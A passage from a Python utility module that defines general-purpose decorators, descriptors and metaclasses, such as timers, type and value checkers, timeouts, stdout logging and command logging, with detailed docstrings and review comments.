            new = func(copy(new))
        # Clear ops list now that chain is complete.
        new.ops.clear()
        if inplace:
            # Adopt the processed copy's state; implicitly returns None.
            self.__dict__ = new.__dict__
        else:
            # Reset this instance's pending queue and hand back the result.
            self.ops.clear()
            return new

    def __repr__(self):
        argstrs = (f'{k}={repr(v)}' for k, v in vars(self).items())
        return f'{type(self).__name__}({", ".join(argstrs)})'
class ContextDecorator(ABC):
    """Abstract base making it easy to write classes usable both as
    decorators and as context managers. Appropriate when the decorator case
    effectively wants to run the function inside the context manager; for
    anything fancier the context-manager semantics become unclear.
    Parentheses are required in both usages (see examples).

    Examples
    --------
    import time

    class Timer(ContextDecorator):

        def __enter__(self):
            self.start = time.perf_counter()

        def __exit__(self, exc_type, exc_value, traceback):
            print('TIME:', time.perf_counter() - self.start)

    @Timer()
    def foo(a, *args):
        pass

    with Timer():
        pass

    # Both usage styles work!
    """

    def __call__(self, *args, **kwargs):
        """NOT invoked when the child class is used as a context manager."""
        # The very first call is the decoration itself: python passes us the
        # function being decorated. Capture it and hand back this callable,
        # mirroring the usual `return wrapper` in function-style decorators.
        if not hasattr(self, 'func'):
            self._wrap_func(args[0])
            return self.__call__
        self.__enter__()
        output = self.func(*args, **kwargs)
        self.__exit__(None, None, None)
        return output

    def _wrap_func(self, func):
        # Store the wrapped function and copy its metadata onto self.
        self.func = func
        update_wrapper(self, func)

    @abstractmethod
    def __enter__(self):
        """Runs before the wrapped function (or the block inside the
        context manager).
        """

    @abstractmethod
    def __exit__(self, exc_type, exc_value, traceback):
        """Runs after the wrapped function finishes. All three arguments are
        None unless an error occurs. Return True to suppress an error.
        """
class Stopwatch(ContextDecorator):
    """Print elapsed time in seconds during a function call or within a context
    manager. Because this is a ContextDecorator, you must explicitly
    instantiate this in both cases.

    @Stopwatch()
    def foo():
        # Do something.

    with Stopwatch():
        # Do something.
    """

    def __init__(self):
        # Background thread running _start; created fresh on each __enter__.
        self.thread = None
        # Flag polled by _start's loop; __exit__ flips it to stop the thread.
        self.running = False
        # Printing is not thread-safe so use logger instead. This format allows
        # us to update a single line rather than creating endless rows of
        # messages. (The prefix appears to be ANSI escape codes that move the
        # cursor back/up and clear the line — TODO confirm on all terminals.)
        self.logger = MultiLogger(None, fmt='\x1b[80D\x1b[1A\x1b[K%(message)s')

    def _start(self):
        """Update elapsed time every tenth of a second."""
        i = 1
        while self.running:
            time.sleep(.1)
            # Elapsed time is approximated as iterations * 0.1s, not wall
            # clock, so it can drift slightly.
            self.logger.info(f'Elapsed: {round(i * .1, 1)} sec')
            i += 1

    def start(self):
        """Start stopwatch in a new thread."""
        self.thread = Thread(target=self._start)
        self.thread.start()

    def stop(self):
        # Blocks until _start's loop notices running=False (up to ~0.1s).
        self.thread.join()

    def __enter__(self):
        self.running = True
        self.start()

    def __exit__(self, exc_type, exc_val, traceback):
        """Can't easily kill thread manually so we must tell it that we're no
        longer running.
        """
        self.running = False
        self.stop()
class class_or_instancemethod(classmethod):
    """Decorator letting one method serve as both an instancemethod and a
    classmethod: its first argument is the instance OR the class, depending
    on how it's accessed.

    Examples
    --------
    class Foo:
        @class_or_instancemethod
        def bar(self, x):
            if isinstance(self, type):
                # Classmethod functionality.
            else:
                # Instancemethod functionality.
    """
    def __get__(self, instance, cls):
        # Accessed on the class: behave exactly like a normal classmethod.
        if instance is None:
            return super().__get__(instance, cls)
        # Accessed on an instance: bind the raw function to the instance.
        return self.__func__.__get__(instance, cls)
class AbstractAttrs(type):
    """Basically the attribute equivalent of abc.abstractmethod: this allows
    us to define an abstract parent class that requires its children to
    possess certain class and/or instance attributes. This differs from
    abc.abstractproperty in a few ways:

    1. abstractproperty ignores instance attributes. AbstractAttrs lets us
    specify required instance attributes and/or class attributes and
    distinguish between the two.
    2. abstractproperty considers the requirement fulfilled by methods,
    properties, and class attributes. AbstractAttrs does not allow methods
    (including classmethods and staticmethods) to fulfill either requirement,
    though properties can fulfill either.

    Examples
    --------
    This class defines required instance attributes and class attributes,
    but you can also specify one or the other. If you don't care whether an
    attribute is at the class or instance level, you can simply use
    @abc.abstractproperty.

    class Parent(metaclass=AbstractAttrs,
                 inst_attrs=['name', 'metric', 'strategy'],
                 class_attrs=['order', 'is_val', 'strategy']):
        pass

    Below, we define a child class that fulfills some but not all requirements.

    class Child(Parent):
        order = 1
        metric = 'mse'

        def __init__(self, x):
            self.x = x

        @staticmethod
        def is_val(x):
            ...

        @property
        def strategy():
            ...

        def name(self):
            ...

    More specifically:

    Pass
    -possesses class attr 'order'
    -possess attribute 'strategy' (property counts as an instance attribute but
    not a class attribute. This is consistent with how it can be called:
    inst.my_property returns a value, cls.my_property returns a property
    object.)

    Fail
    -'metric' is a class attribute while our interface requires it to be an
    instance attribute
    -'name' is a method but it must be an instance attribute
    -'is_val' is a staticmethod but it must be a class attribute
    """
    def __new__(cls, name, bases, methods, **meta_kwargs):
        """This provides user-defined parent classes with an
        `__init_subclass__` method that checks for class attributes. Errors
        will occur when the parent class is defined, not when instances of it
        are constructed.
        """
        class_ = type.__new__(cls, name, bases, methods)
        # Requirements arrive as metaclass keyword args in the parent's
        # class statement (see docstring example).
        class_attrs = meta_kwargs.get('class_attrs', [])
        inst_attrs = meta_kwargs.get('inst_attrs', [])

        def __init_subclass__(cls, **kwargs):
            super().__init_subclass__(**kwargs)
            for attr in class_attrs:
                # TypeError maintains consistency with abstractmethod.
                # Remaining checks occur at instantiation.
                if not hasattr(cls, attr):
                    raise TypeError(f'{cls} must have class attribute '
                                    f'`{attr}`.')

        # Make sure we distinguish between the abstract parent class that
        # defines an interface and the child classes that implement it. The
        # abstract parent should not define the required attributes: it merely
        # enforces the requirement that its children do. We want the children
        # to inherit class_attrs and inst_attrs without overwriting them when
        # use them for validation. Only change this if you're very confident
        # you understand the repercussions.
        if class_attrs or inst_attrs:
            class_.__init_subclass__ = classmethod(__init_subclass__)
            class_._is_parent = True
            class_.class_attrs = class_attrs
            class_.inst_attrs = inst_attrs
        else:
            class_._is_parent = False
        return class_

    def __call__(cls, *args, **kwargs):
        """This is called when we create instances of our classes. Parents are
        initialized normally, while children undergo a series of checks for
        each of our required attributes.
        """
        inst = cls.__new__(cls, *args, **kwargs)
        # Mirror the standard instantiation guard: only run __init__ when
        # __new__ actually produced an instance of cls.
        if not isinstance(inst, cls): return inst
        inst.__init__(*args, **kwargs)
        if cls._is_parent: return inst

        # Validate children.
        for attr in inst.inst_attrs:
            # TypeError maintains consistency with abstractmethod.
            if not hasattr(inst, attr):
                raise TypeError(f'Instances of {type(inst)} must '
                                f'have instance attribute `{attr}`.')
            elif ismethod(getattr(inst, attr)):
                raise TypeError(f'`{attr}` must be an instance attribute, '
                                'not a method.')

        # In AbstractAttrs.__new__, methods are still unbound so we couldn't
        # easily check this until now.
        for attr in inst.class_attrs:
            # `ismethod` must check inst, not cls (cls.method is a function
            # while inst.method is a method). staticmethod can be retrieved
            # from either. hasstatic is an htools.core helper (imported at
            # the top of this module).
            if inspect.ismethod(getattr(inst, attr)) or hasstatic(inst, attr):
                raise TypeError(f'`{attr}` must be a class attribute, not a '
                                'method.')
            # property must be retrieved from cls, not inst.
            elif isinstance(getattr(cls, attr), property):
                raise TypeError(
                    f'`{attr}` must be a class attribute, not a property. '
                    'Properties fulfill instance attribute requirements but '
                    'not class attribute requirements.'
                )
        return inst
class Counted:
    """Add zero-index instance attribute "instance_num" tracking order in
    which instances were created. Class attribute "_instance_count" tracks the
    number of currently-live instances of the class.

    class Bar(Counted):

        def __init__(self):
            super().__init__()
            self.x = x

    >>> b = Bar(3)
    >>> b2 = Bar(3)
    >>> b.instance_num, b2.instance_num
    0, 1
    >>> Bar._instance_count
    2
    """

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        # Each subclass gets its own independent counter.
        cls._instance_count = 0

    def __init__(self):
        # Record this instance's creation order, then bump the class total.
        self.instance_num = self._instance_count
        type(self)._instance_count += 1

    def __del__(self):
        # Must decrement the CLASS attribute explicitly: the previous
        # `self._instance_count -= 1` merely created an instance attribute
        # on the dying object, so the class-level count never went down.
        type(self)._instance_count -= 1
def counted(func):
    """Decorator tracking how many times a function has been called, exposed
    via a `call_count` attribute on the wrapper. The counter increments only
    AFTER a call completes, so a call that raises is not counted.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        out = func(*args, **kwargs)
        wrapper.call_count += 1
        return out

    wrapper.call_count = 0
    return wrapper
def params(func):
    """Return the parameters in a function's signature.

    Parameters
    ----------
    func: function

    Returns
    -------
    dict: Maps parameter name (str) to its inspect.Parameter object.
    """
    return {**signature(func).parameters}
def hasarg(func, arg):
    """Check whether a function's signature contains a parameter with the
    given name. (Technically "hasparam" would be more precise, but "hasarg"
    matches the no-space convention of hasattr/getattr while staying
    readable.)

    Parameters
    ----------
    func: function
    arg: str
        The parameter name to look for in func's signature.

    Returns
    -------
    bool: True if `func` has a parameter named `arg`.
    """
    return arg in signature(func).parameters
def bound_args(func, args, kwargs, collapse_kwargs=True):
    """Compute a function's bound arguments with defaults applied. A common
    building block for decorators that log, check, or alter how a function
    was called.

    Parameters
    ----------
    func: function
    args: tuple
        The positional arguments as a tuple (not *args).
    kwargs: dict
        The keyword arguments as a dict (not **kwargs).
    collapse_kwargs: bool
        If True, merge any **kwargs entry into the top-level mapping, e.g.
        {'a': 1, 'b': True, 'kwargs': {'c': 'c_val', 'd': 0}} ->
        {'a': 1, 'b': True, 'c': 'c_val', 'd': 0}

    Returns
    -------
    OrderedDict[str, any]: Maps parameter name to passed value.
    """
    binding = signature(func).bind_partial(*args, **kwargs)
    binding.apply_defaults()
    mapping = binding.arguments
    if collapse_kwargs:
        mapping.update(mapping.pop('kwargs', {}))
    return mapping
def handle_interrupt(func=None, cbs=(), verbose=True):
    """Decorator that allows us to interrupt a function with ctrl-c. We can
    pass in callbacks that execute on function end. Keep in mind that local
    variables will be lost as soon as `func` stops running. If `func` is a
    method, it may be appropriate to update instance variables while running,
    which we can access because the instance will be the first element of
    `args` (passed in as `self`).

    Notes:
    -Kwargs are passed to callbacks as a single dict, not as **kwargs.
    -A 'status_code' attribute tracks whether the last call was successful
    (0) or interrupted (1). It is updated before callbacks execute.
    -Callbacks always run (in a `finally`), even when `func` raises an
    exception other than KeyboardInterrupt; in that case they receive None
    as the result and the exception then propagates.

    Parameters
    ----------
    func: function
        The decorated function. Left as None when using the parameterized
        form @handle_interrupt(cbs=..., verbose=...).
    cbs: Iterable[Callback]
        Callbacks to execute when `func` completes, interrupted or not.
    verbose: bool
        If True, print a message to stdout when an interrupt occurs.
    """
    # Parameterized usage: return a decorator awaiting the function.
    if not func:
        return partial(handle_interrupt, cbs=tolist(cbs), verbose=verbose)
    func.status_code = 0
    for cb in cbs:
        cb.setup(func)

    @wraps(func)
    def wrapper(*args, **kwargs):
        # Equivalent to bound_args(func, args, kwargs, collapse_kwargs=False):
        # map parameter names to passed values with defaults applied.
        bound = signature(func).bind_partial(*args, **kwargs)
        bound.apply_defaults()
        func_inputs = bound.arguments
        for cb in cbs:
            cb.on_begin(func, func_inputs)
        # Initialize so the `finally` block always sees a defined value —
        # previously an exception other than KeyboardInterrupt left `res`
        # unbound and callbacks crashed with NameError, masking the real
        # error.
        res = None
        try:
            res = func(*args, **kwargs)
            wrapper.status_code = 0
        except KeyboardInterrupt:
            if verbose: print('KeyboardInterrupt. Aborting...')
            res = None
            wrapper.status_code = 1
        finally:
            for cb in cbs:
                cb.on_end(func, func_inputs, res)
        return res
    return wrapper
@contextmanager
def assert_raises(error):
    """Context manager asserting that a block raises a specific error. Nice
    for keeping notebooks free of raw tracebacks.

    Parameters
    ----------
    error: class inheriting from Exception or BaseException
        The type of error to expect, e.g. ValueError.

    Examples
    --------
    # Passes quietly: the expected error occurred.
    >>> with assert_raises(TypeError) as ar:
    >>>     a = 'b' + 6

    # Raises AssertionError: the wrong error occurred.
    >>> with assert_raises(ValueError) as ar:
    >>>     a = 'b' + 6

    # Raises AssertionError: no error occurred at all.
    >>> with assert_raises(ValueError) as ar:
    >>>     a = 'b' + '6'
    """
    try:
        yield
    except error as e:
        # The expected failure: announce and swallow it.
        print(f'As expected, got {error.__name__}({e}).')
    except Exception as e:
        # Some other error: surface it as an assertion failure, hiding the
        # original traceback chain.
        raise AssertionError(
            f'Wrong error raised. Expected {error.__name__},'
            f' got {type(e).__name__}({e}).'
        ) from None
    else:
        # The block succeeded, which is itself a failure here.
        raise AssertionError(f'No error raised, expected {error.__name__}.')
class TimeExceededError(Exception):
    """Raised when a `timebox`/`timeboxed` time limit is exceeded."""
    pass
def timebox_handler(time, frame):
    """Unconditionally raise TimeExceededError. The (time, frame) signature
    matches the signal-handler convention, so this was presumably intended
    as a SIGALRM handler — note that `timebox` below installs its own inline
    handler instead.

    NOTE(review): the parameter name `time` shadows the `time` module inside
    this function.
    """
    raise TimeExceededError('Time limit exceeded.')
@contextmanager
def timebox(seconds, strict=True, freq=.1, cleanup=True):
    """Try to execute code for specified amount of time before throwing error.
    If you don't want to throw an error, use with a try/except block.

    NOTE: relies on SIGALRM/setitimer, so it is unix-only and must run in the
    main thread (the `signal` module rejects handlers set elsewhere).

    Parameters
    ----------
    seconds: float
        Max number of seconds before throwing error. This will be enforced with
        a relatively low level of precision.
    strict: bool
        If True, timeout will cause an error to be raised, halting execution of
        the entire program. If False, a warning message will be printed and
        the timeboxed operation will end, letting the program proceed to the
        next step.
    freq: float
        How often to update progress bar (measured in seconds).
    cleanup: bool
        If True, progress bar will disappear on function end. This is nice if
        we're calling the decorated function inside a loop and don't want
        hundreds of progress bars littering the notebook/terminal.

    Examples
    --------
    with timebox(5) as tb:
        x = computationally_expensive_code()

    More permissive version:

    x = step_1()
    with timebox(5) as tb:
        try:
            x = slow_step_2()
        except TimeExceededError:
            pass
    """
    def update_custom_pbar(signum, frame):
        """Handler that is called every `freq` seconds. User never calls this
        directly.
        """
        pbar.update(n=freq)
        # pbar.start_t appears to be tqdm's internal creation timestamp —
        # TODO confirm this attribute remains stable across tqdm versions.
        if time.time() - pbar.start_t >= seconds:
            raise TimeExceededError('Time limit exceeded.')

    pbar = tqdm(total=seconds, bar_format='{l_bar}{bar}|{n:.2f}/{total:.1f}s',
                leave=not cleanup)
    try:
        # Fire SIGALRM every `freq` seconds (initial delay and interval both
        # `freq`); the handler updates the bar and enforces the deadline.
        signal.signal(signal.SIGALRM, update_custom_pbar)
        signal.setitimer(signal.ITIMER_REAL, freq, freq)
        yield
    except TimeExceededError as e:
        if strict: raise
        # Non-strict mode: downgrade the timeout to a warning and move on.
        warnings.warn(e.args[0])
    finally:
        # Always close the bar and cancel any pending alarm.
        pbar.close()
        signal.alarm(0)
def timeboxed(time, strict=True, freq=.1):
    """Decorator form of `timebox`: give the decorated function at most
    `time` seconds to run before raising (or warning about) a timeout.

    Parameters
    ----------
    time: float
        Max number of seconds before throwing error. Enforced with a
        relatively low level of precision.
    strict: bool
        If True, a timeout raises an error and halts the program. If False,
        only a warning is printed and execution continues.
    freq: float
        How often to update the progress bar (in seconds).

    Examples
    --------
    @timeboxed(5)
    def func(x, y):
        # If function does not complete within 5 seconds, will throw error.
    """
    def decorator(func):
        @wraps(func)
        def inner(*args, **kwargs):
            # Delegate the actual timing/enforcement to the context manager.
            with timebox(time, strict, freq):
                return func(*args, **kwargs)
        return inner
    return decorator
class cached_property:
    """Descriptor that memoizes a zero-argument method: the wrapped method
    runs once, and its result is then stored on the instance under the same
    name, shadowing the descriptor for all later accesses. Lowercase name
    kept for consistency with the module's other decorators. As with
    @property, no parentheses are used at the call site.

    Examples
    --------
    class Vocab:
        def __init__(self, tokens):
            self.tokens = tokens

        @cached_property
        def embedding_matrix(self):
            print('Building matrix...')
            # Slow computation to build and return a matrix of embeddings.
            return matrix

    The first access of `v.embedding_matrix` prints 'Building matrix...' and
    computes the result; subsequent accesses return the stored value with no
    recomputation.
    """

    def __init__(self, func):
        # The expensive method to call exactly once per instance.
        self.func = func

    def __get__(self, instance, owner):
        """Only invoked while the attribute is absent from the instance's
        __dict__; after the first call the cached value shadows this
        descriptor, so neither this method nor the wrapped function runs
        again (unless the attribute is deleted).
        """
        # Class-level access (instance is None) returns the descriptor.
        if instance is None:
            return self
        # Instance access: compute once, cache on the instance, return.
        result = self.func(instance)
        setattr(instance, self.func.__name__, result)
        return result
class ReadOnly:
    """Descriptor that makes an attribute write-once: after the first
    assignment the value can be neither changed nor deleted. The attribute
    must be declared as a class variable (see example). Direct manipulation
    of the instance __dict__ is deliberately left possible for flexibility.

    Examples
    --------
    class Dog:
        breed = ReadOnly()

        def __init__(self, breed, age):
            # Once breed is set in the line below, it cannot be changed.
            self.breed = breed
            self.age = age

    >>> d = Dog('dalmatian', 'Arnold')
    >>> d.breed
    'dalmatian'
    >>> d.breed = 'labrador'
    PermissionError: Attribute is read-only.
    >>> del d.breed
    PermissionError: Attribute is read-only.
    """

    def __init__(self):
        # Weak references so the descriptor never keeps instances alive.
        self.initialized = WeakSet()

    def __set_name__(self, owner, name):
        # Record the class-variable name this descriptor was assigned to.
        self.name = name

    def __get__(self, instance, owner):
        if instance is None:
            return self
        if instance in self.initialized:
            return instance.__dict__[self.name]
        # Uninitialized access: warn and (implicitly) return None.
        warnings.warn(
            f'Read-only attribute {self.name} has not been initialized.'
        )

    def __set__(self, instance, value):
        # Permit exactly one assignment per instance.
        if instance in self.initialized:
            raise PermissionError('Attribute is read-only.')
        instance.__dict__[self.name] = value
        self.initialized.add(instance)

    def __delete__(self, instance):
        raise PermissionError('Attribute is read-only.')
def validating_property(func, allow_del=False):
    """Factory producing property-makers that validate on assignment. The
    returned callable is used at class-definition time to create a class
    variable; instances then get/set the value through it.

    Parameters
    ----------
    func: function
        Single-argument predicate applied to every value assigned to the
        managed attribute. Return True to accept the value, False to reject.
    allow_del: bool
        If True, the attribute may also be deleted.

    Returns
    -------
    function: Call it with the attribute's name to obtain a validating
        property. The name argument must match the class-variable name it is
        assigned to.

    Examples
    --------
    LengthyInt = validating_property(
        lambda x: isinstance(x, int) and len(str(int)) > 4
    )

    class Foo:
        long = LengthyInt('long')
        def __init__(self, a, long):
            self.a = a
            self.long = long

    >>> foo = Foo(3, 543210)
    >>> foo.long
    543210
    >>> foo = Foo(3, 'abc')
    ValueError: Invalid value 'abc' for argument long.
    """
    def prop(name):
        def fget(instance):
            # Value lives in the instance dict under the property's name.
            return instance.__dict__[name]

        def fset(instance, val):
            # Reject any value the user predicate disapproves of.
            if not func(val):
                raise ValueError(f'Invalid value {val} for argument {name}.')
            instance.__dict__[name] = val

        fdel = None
        if allow_del:
            def fdel(instance):
                del instance.__dict__[name]
        return property(fget, fset, fdel)
    return prop
class Callback(ABC):
    """Abstract base class for callbacks passed to the @callbacks decorator.
    Subclasses must implement `setup`, `on_begin`, and `on_end`; the latter
    two receive the decorated function's bound inputs and (for on_end) its
    output.

    Tip: if both hooks should do the same work, implement one undecorated
    __call__ and have on_begin/on_end delegate to it; the @debug decorator
    also pairs well with these methods.
    """

    @abstractmethod
    def setup(self, func):
        """Called once when the decorator is applied.

        Parameters
        ----------
        func: function
            The function being decorated.
        """

    @abstractmethod
    def on_begin(self, func, inputs, output=None):
        """Called immediately before each invocation of the wrapped function.

        Parameters
        ----------
        func: function
            The function being decorated.
        inputs: dict
            Bound arguments the wrapped function is about to be called with.
        output: any
            Always None here; the parameter exists so on_begin and on_end
            share a signature.
        """

    @abstractmethod
    def on_end(self, func, inputs, output=None):
        """Called immediately after each invocation of the wrapped function.

        Parameters
        ----------
        func: function
            The function being decorated.
        inputs: dict
            Bound arguments the wrapped function was called with.
        output: any
            The value the wrapped function returned.
        """

    def __repr__(self):
        # E.g. "PrintOutput()" for a subclass named PrintOutput.
        return f'{self.__class__.__name__}()'
def callbacks(cbs):
    """Decorator attaching stateful callbacks to a function. Each callback is
    an object implementing the Callback interface (setup/on_begin/on_end),
    which lets hooks accumulate state rather than merely print or rely on
    globals.

    Parameters
    ----------
    cbs: list
        Callback objects to run before and after the decorated function.

    Examples
    --------
    @callbacks([PrintHyperparameters(), PlotActivationHist(),
                ActivationMeans(), PrintOutput()])
    def train_one_epoch(**kwargs):
        # Train model.
    """
    def decorator(func):
        # setup() fires once, at decoration time.
        for cb in cbs:
            cb.setup(func)

        @wraps(func)
        def wrapper(*args, **kwargs):
            # Resolve the call's arguments (including defaults) so hooks
            # see a name -> value mapping.
            bound = signature(func).bind_partial(*args, **kwargs)
            bound.apply_defaults()
            arguments = bound.arguments
            for cb in cbs:
                cb.on_begin(func, arguments, None)
            result = func(*args, **kwargs)
            for cb in cbs:
                cb.on_end(func, arguments, result)
            return result
        return wrapper
    return decorator
def typecheck(func_=None, **types):
    """Decorator to enforce type checking for a function or method. Types may
    be passed explicitly to the decorator or inferred from the decorated
    function's annotations; both usages are supported because older Python
    versions lack annotations and because annotation syntax can hurt
    readability.

    Parameters
    ----------
    func_: function
        The function to decorate. When using the decorator with
        manually-specified types, this is None. The trailing underscore lets
        `func` remain a valid keyword argument for the wrapped function.
    types: type
        Optional way to specify variable types. Use standard types rather
        than the typing library, as subscripted generics are not supported
        (e.g. typing.List[str] will not work with isinstance).

    Examples
    --------
    Types may be single types or tuples of types, for all or a subset of
    arguments:

    @typecheck(x=float, y=(int, float), iters=int, verbose=bool)
    def process(x, y, z, iters=5, verbose=True):
        ...

    >>> process(3.1, 4.5, 0, 2.0)
    TypeError: iters must be <class 'int'>, not <class 'float'>.

    Equivalently, with annotations (return annotations are ignored):

    @typecheck
    def process(x:float, y:(int, float), z, iters:int=5, verbose:bool=True):
        ...
    """
    # Case 1: keyword args passed to the decorator specify the types.
    if not func_:
        return partial(typecheck, **types)
    # Case 2: infer types from annotations. Skipped if Case 1 occurred.
    # Use the public inspect.Parameter.empty sentinel rather than the
    # private inspect._empty.
    elif not types:
        types = {k: v.annotation
                 for k, v in signature(func_).parameters.items()
                 if v.annotation is not inspect.Parameter.empty}

    @wraps(func_)
    def wrapper(*args, **kwargs):
        # signature(wrapper) follows __wrapped__ back to func_, so bound
        # names match the original parameter names.
        fargs = signature(wrapper).bind(*args, **kwargs).arguments
        for k, v in types.items():
            if k in fargs and not isinstance(fargs[k], v):
                raise TypeError(
                    f'{k} must be {str(v)}, not {type(fargs[k])}.'
                )
        return func_(*args, **kwargs)
    return wrapper
def valuecheck(func):
    """Decorator that checks whether user-specified arguments are acceptable.
    Because this re-purposes annotations to specify values rather than types,
    it can NOT be combined with the @typecheck decorator. Membership is
    tested with equality, so 4 and 4.0 are considered equivalent.

    Parameters
    ----------
    func: function
        The function to decorate. Annotate parameters with tuples of
        acceptable values, as shown below.

    Examples
    --------
    @valuecheck
    def foo(a, b:('min', 'max'), c=6, d:(True, False)=True):
        return d, c, b, a

    >>> foo(3, 'min')
    (True, 6, 'min', 3)
    >>> foo('a', 'mean')
    ValueError: Invalid argument for parameter b. Value must be in
    ('min', 'max').
    """
    # The signature and annotations never change, so compute them once at
    # decoration time instead of on every call.
    sig = signature(func)
    annos = {k: v.annotation for k, v in sig.parameters.items()}

    @wraps(func)
    def wrapper(*args, **kwargs):
        bound = sig.bind(*args, **kwargs)
        bound.apply_defaults()
        for k, v in bound.arguments.items():
            choices = annos[k]
            # Unannotated params are unconstrained. Public sentinel used in
            # place of the private inspect._empty.
            if choices is inspect.Parameter.empty: continue
            if v not in choices:
                raise ValueError(f'Invalid argument for parameter {k}. '
                                 f'Value must be in {choices}.')
        return func(*args, **kwargs)
    return wrapper
def deprecated(func=None, *, msg=''):
    """Mark a function as deprecated: documents the fact in the code and
    emits a warning whenever the function is called.

    Parameters
    ----------
    func: FunctionType
        Supplied automatically by the decorator machinery.
    msg: str (optional)
        Custom warning text shown when the function is called. Must be
        passed as a keyword argument. For the default message, use the
        no-parentheses decorator form.

    Examples
    --------
    @deprecated
    def my_old_func():
        # ...

    @deprecated(msg='My custom message!')
    def my_old_func():
        # ...
    """
    # Parenthesized usage: re-enter with msg bound, awaiting the function.
    if not func:
        return partial(deprecated, msg=msg)
    assert callable(func), \
        '`deprecated` received a non-callable argument instead of a '\
        'function. If you meant to pass in msg, it must be a keyword arg.'

    @wraps(func)
    def wrapper(*args, **kwargs):
        # Custom msg wins; otherwise build the default lazily (short-circuit
        # means func_name is only evaluated when msg is empty).
        warnings.warn(
            msg or f'Soft deprecation: {func_name(func)} should not be used '
            f'anymore.')
        return func(*args, **kwargs)
    return wrapper
def debug(func=None, prefix='', arguments=True, out_path=None):
    """Decorator that prints information about a function call, typically
    used temporarily while debugging. A wrapped function accepting *args will
    display an 'args' entry in the printed signature because the goal is to
    show which values map to which parameters (so the printed string is not
    necessarily executable code in that case).

    The decorator can be used with or without arguments.

    Parameters
    ----------
    func: function
        Function being decorated.
    prefix: str
        A short string to prepend the printed message with. Ex: '>>>'
    arguments: bool
        If True, the printed message includes the function arguments; if
        False, only the function name is printed.
    out_path: str or Path or None
        If provided, a dict of arguments will be saved as a json file at this
        path. Intermediate directories are created as needed, and the
        function's arguments are available for string formatting in the file
        name, e.g. 'data/models/{prefix}/args.json'.

    Examples
    --------
    @debug
    def f(a, b, x=0, y=None, z=4, c=2):
        return a + b + c

    >>> f(3, 4, 1)
    CALLING f(a=3, b=4, x=1, y=None, z=4, c=2)
    9

    @debug(prefix='***', arguments=False)
    def f(a, b, x=0, y=None, z=4, c=2):
        return a + b + c

    >>> f(3, 4, 1)
    *** CALLING f()
    9
    """
    if not func:
        if prefix: prefix += ' '
        if out_path:
            assert str(out_path).endswith('.json'), \
                'out_path must ends with .json'
        return partial(debug, prefix=prefix, arguments=arguments,
                       out_path=out_path)

    @wraps(func)
    def wrapper(*args, **kwargs):
        out_fmt = '\n{}CALLING {}({})'
        arg_strs = ''
        sig = None
        # Bound arguments are needed both for the printed message and for
        # saving to out_path. (Previously `sig` was only computed inside the
        # `arguments` branch, so arguments=False with an out_path raised
        # NameError.)
        if arguments or out_path:
            sig = bound_args(wrapper, args, kwargs, collapse_kwargs=True)
            if sig:
                first_key = next(iter(sig))
                # Remove self/cls arg from methods. Just check first arg to
                # be extra careful.
                if first_key in ('self', 'cls'):
                    del sig[first_key]
        if arguments and sig:
            arg_strs = (f'{k}={repr(v)}' for k, v in sig.items())
        # Print call message and return output.
        print(out_fmt.format(prefix, func.__qualname__, ', '.join(arg_strs)))
        if out_path: save(dict(sig), str(out_path).format(**sig))
        return func(*args, **kwargs)
    return wrapper
def log_stdout(func=None, fname=''):
    """Decorator that logs all stdout produced by a function to a file.

    Parameters
    ----------
    func: function
        With the parenthesis-free form, the function arrives here
        automatically; you never pass it explicitly.
    fname: str
        Path of the log file to create. If unspecified, defaults to
        ./logs/wrapped_func_name.log. Must be given as a keyword argument.

    Examples
    --------
    @log_stdout
    def foo(a, b=3):
        print(a)
        a *= b
        print(a)
        return a**b

    @log_stdout(fname='../data/mylog.log')
    def foo(a, b=3):
        ...
    """
    if not func:
        # Defer Path conversion: Path('') evaluates to Path('.'), which is
        # truthy and previously prevented the default filename from being
        # applied for the bare `@log_stdout()` form.
        return partial(log_stdout, fname=fname)
    fname = Path(fname) if fname else Path(f'./logs/{func.__name__}.log')

    @wraps(func)
    def wrapper(*args, **kwargs):
        # Create parent dirs lazily so the decorator itself has no side
        # effects at import time.
        os.makedirs(fname.parent, exist_ok=True)
        with open(fname, 'w') as f:
            with redirect_stdout(f):
                out = func(*args, **kwargs)
        return out
    return wrapper
def return_stdout(func):
    """Decorator that captures and returns everything the wrapped function
    prints to stdout. Handy for retrofitting a print-only function when you
    later need its output programmatically. Don't use it on a function that
    already returns something meaningful — only the captured stdout is
    returned (for that case, see `log_stdout`).
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        buffer = io.StringIO()
        with redirect_stdout(buffer):
            func(*args, **kwargs)
        return buffer.getvalue()
    return wrapper
def log_cmd(path, mode='w', defaults=False):
    """Decorator that saves the calling command for a python script — handy
    for ML training CLIs you may want to re-run later with similar args.
    When importing a wrapped function (or a class with a wrapped method),
    logging only occurs if you set

    `os.environ['LOG_CMD'] = 'true'`

    in your script ('True' and '1' also work, but must be strings; the value
    does not persist after the script completes). This guard exists because
    accidentally overwriting log files can be disastrous.

    Parameters
    ----------
    path: str or Path
        File where output will be saved. Function args/kwargs are available
        for string formatting, e.g. 'logs/train_run_v{version_number}.txt'.
    mode: str
        'a' to append, 'w' to overwrite. Usually 'a' since we track multiple
        trials.
    defaults: bool
        If True, log every argument value including unspecified defaults
        (useful if defaults might change over time). If False, only args
        explicitly present in the command are logged.

    Examples
    --------
    # train.py
    import fire

    @log_cmd('logs/training_runs.txt')
    def train(lr, epochs, dropout, arch, data_version, layer_dims):
        # Train model

    if __name__ == '__main__':
        fire.Fire(train)

    $ python train.py --lr 3e-3 --epochs 50 --dropout 0.5 --arch awd_lstm \
        --data_version 1 --layer_dims '[64, 128, 256]'

    After running, 'logs/training_runs.txt' contains a nicely formatted
    version of the command with one line per argument.
    """
    def decorator(func):
        @wraps(func)
        def wrapped(*args, **kwargs):
            # Don't log when another module merely imports the wrapped
            # function, unless LOG_CMD explicitly enables it. Without this
            # check, a script calling another script would always clobber
            # the old command.
            if func.__module__ != '__main__' and not \
                    os.environ.get('LOG_CMD', '').lower() in ('true', '1'):
                return func(*args, **kwargs)
            # Log the command BEFORE running the script so a late failure
            # can't lose a long process's record.
            fn_locals = bound_args(func, args, kwargs, True)
            start_of_line = ' \\\n\t'
            res = 'python'
            if defaults:
                # Separate interpreter from script path (previously they
                # were concatenated with no space: 'python/path/to/file').
                res += ' ' + __file__
                for k, v in fn_locals.items():
                    # Enclose data structure args in single quotes and use
                    # double quotes inside if necessary.
                    if isinstance(v, (tuple, list, dict, set)):
                        v = "'" + str(v).replace("'", '"') + "'"
                    res += f'{start_of_line}--{k} {v}'
            else:
